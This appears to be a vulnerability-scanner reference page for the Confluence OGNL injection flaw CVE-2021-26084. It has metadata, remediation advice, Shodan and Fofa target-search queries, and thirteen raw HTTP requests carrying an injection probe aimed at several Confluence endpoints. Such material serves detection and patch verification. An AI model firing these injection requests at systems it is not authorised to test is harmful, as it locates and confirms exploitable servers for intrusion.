| Title | Confluence Server - Remote Code Execution |
|---|---|
| Author | dhiyaneshDk,philippedelteil |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. |
| Remediation | Apply the latest security patches provided by Atlassian to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.9444 |
| CVE ID | CVE-2021-26084 |
| CWE ID | CWE-917 |
| Shodan Query | http.component:"Atlassian Confluence"http.component:"atlassian confluence" |
| Fofa Query | app="atlassian-confluence" |
| Tags | cve2021 cve rce confluence injection ognl kev atlassian vkev vuln |
Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.
POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/createpage-entervariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /confluence/pages/createpage-entervariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.6
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /wiki/pages/createpage-entervariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.2
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/createpage-entervariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /template/custom/content-editor HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/doenterpagevariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /users/user-dark-features HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_9 rv:6.0; ms-MY) AppleWebKit/532.11.2 (KHTML, like Gecko) Version/5.0 Safari/532.11.2
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /templates/editor-preload-container HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/createpage.action?spaceKey=myproj HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/templates2/viewpagetemplate.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-26084.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-26084.pcap
N/AN/A